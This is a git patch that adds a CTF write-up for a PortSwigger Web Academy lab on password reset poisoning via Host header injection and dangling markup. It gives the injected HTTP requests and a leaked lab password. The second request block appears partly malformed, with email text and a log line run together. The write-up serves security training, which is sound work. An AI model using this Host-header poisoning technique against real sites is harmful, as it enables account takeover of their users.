From 932d47d4e1f7d6b3b55cb4ae9af730592bb9877c Mon Sep 17 00:00:00 2001 From: xanhacks Date: Fri, 9 Dec 2022 18:35:20 +0100 Subject: [PATCH] add host header password leak --- docs/web/ctf/web_academy.md | 42 +++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/docs/web/ctf/web_academy.md b/docs/web/ctf/web_academy.md index fcf5436..5f2a409 100644 --- a/docs/web/ctf/web_academy.md +++ b/docs/web/ctf/web_academy.md @@ -6,6 +6,48 @@ ignore_macros: true # PortSwigger Web Academy +## HTTP Host Header attacks + +### Password leak via dangling markup + +> Lab: [Password reset poisoning via dangling markup](https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning/lab-host-header-password-reset-poisoning-via-dangling-markup) + +A normal password reset will send the following email to the user : + +``` +Hello! + +Please click here (https://xxx.web-security-academy.net/login) to login with your new password: D7c0EJwAWM + +Thanks, +Support team +This email has been scanned by the MacCarthy Email Security service +``` + +We can inject the host header in the password reset request to modify the link inside the email : + +``` +POST /forgot-password HTTP/1.1 +Host: xxx.web-security-academy.net:CANARY1337 // <- here +``` + +We now have the following link : `https://xxx.web-security-academy.net:CANARY1337/login` + +Let's try to leak the password using dangling markup : + +``` +POST /forgot-password HTTP/1.1 +Host: xxx.web-security-academy.net:">click+here+to+login+with+your+new+password:+ld92i9hv1e

Thanks,
Support+team

This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service HTTP/1.1" 404 +``` + +You can now login into the carlos account with `carlos:ld92i9hv1e`. + ## DOM Clobbering ### DOM clobbering to bypass DOMPurify